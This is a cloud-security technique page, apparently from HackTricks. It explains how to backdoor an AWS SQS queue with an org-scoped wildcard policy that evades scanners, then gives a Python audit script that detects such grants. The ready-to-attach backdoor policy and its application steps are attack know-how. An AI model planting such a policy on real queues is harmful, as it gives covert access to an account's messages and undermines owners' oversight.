# AWS - SQS OrgID Policy Backdoor
{{#include ../../../../banners/hacktricks-training.md}}
Abuse an SQS queue resource policy to silently grant `sqs:SendMessage`, `sqs:ReceiveMessage` and `sqs:ChangeMessageVisibility` to any principal that belongs to a target AWS Organization by using the condition key `aws:PrincipalOrgID`. This creates an org-scoped hidden path that often evades controls which only look for explicit account or role ARNs, or for unconditioned `*` principals: the statement below does use `"Principal": "*"`, but the org condition makes many scanners treat it as non-public.

## Backdoor policy (attach to the SQS queue policy)
```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "OrgScopedBackdoor",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sqs:ReceiveMessage",
        "sqs:SendMessage",
        "sqs:ChangeMessageVisibility",
        "sqs:GetQueueAttributes"
      ],
      "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
      "Condition": {
        "StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
      }
    }
  ]
}
```
## Steps
- Obtain the Organization ID with the AWS Organizations API.
- Get the SQS queue ARN and set the queue policy so that it includes the statement above.
- From any principal that belongs to that Organization, send and receive a message on the queue to validate access.
## Impact
- Organization-wide hidden access to read and write SQS messages from any account in the specified AWS Organization.
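The defensive counterpart to the policy above is to audit every queue policy for `Allow` statements whose only narrowing of a `*` principal is `aws:PrincipalOrgID`, and to compare that org ID against your own organization (`aws organizations describe-organization`). The following is an added example written for this page, not HackTricks or AWS code: it parses a policy document offline, so the sample policy (the one from this page plus a constructed owner statement), the org ID `o-myownorg01` and the `main` usage are all constructed placeholders. In a real audit the policy string would come from `sqs.get_queue_attributes(QueueUrl=..., AttributeNames=["Policy"])`.

```python
import json

# Constructed sample policy: the org-scoped statement from this page plus a normal
# owner statement, so the audit has one hit and one miss to work on.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "OrgScopedBackdoor",
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:ReceiveMessage",
                "sqs:SendMessage",
                "sqs:ChangeMessageVisibility",
                "sqs:GetQueueAttributes",
            ],
            "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
            "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-xxxxxxxxxx"}},
        },
        {
            "Sid": "OwnerFullAccess",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::ACCOUNT_ID:root"},
            "Action": "sqs:*",
            "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
        },
    ],
})

# Constructed placeholder for the organization this account really belongs to.
# Take the real value from `aws organizations describe-organization`.
MY_ORG_ID = "o-myownorg01"

# Actions that let a principal read or write messages (the ones the backdoor grants).
DATA_PLANE_ACTIONS = {"sqs:sendmessage", "sqs:receivemessage", "sqs:changemessagevisibility"}


def _as_list(value):
    """IAM allows scalars or lists in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_wildcard_principal(principal):
    """True for "Principal": "*" and for {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def _org_ids(condition):
    """Collect every aws:PrincipalOrgID value, whatever the condition operator."""
    ids = []
    for _operator, pairs in (condition or {}).items():
        for key, value in pairs.items():
            if key.lower() == "aws:principalorgid":
                ids.extend(_as_list(value))
    return ids


def find_org_scoped_grants(policy_json, own_org_id):
    """Return one finding per Allow statement that opens a wildcard principal
    to an entire organization via aws:PrincipalOrgID."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _is_wildcard_principal(stmt.get("Principal")):
            continue
        org_ids = _org_ids(stmt.get("Condition"))
        if not org_ids:
            continue  # unconditioned "*" is a public queue; public-access tooling already flags that
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        data_plane = "sqs:*" in actions or bool(actions & DATA_PLANE_ACTIONS)
        foreign = [o for o in org_ids if o != own_org_id]
        findings.append({
            "sid": stmt.get("Sid"),
            "org_ids": org_ids,
            "foreign_org": bool(foreign),
            "data_plane": data_plane,
            # A foreign org with message read/write is the pattern described on this page.
            "severity": "HIGH" if foreign and data_plane else "INFO",
        })
    return findings


if __name__ == "__main__":
    for f in find_org_scoped_grants(SAMPLE_POLICY, MY_ORG_ID):
        print(f)
```

Statements scoped to your own org ID are reported as `INFO` rather than `HIGH`, because org-wide sharing of a queue is a legitimate pattern; the signal to act on is an org ID that is not yours combined with message read or write actions.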
{{#include ../../../../banners/hacktricks-training.md}}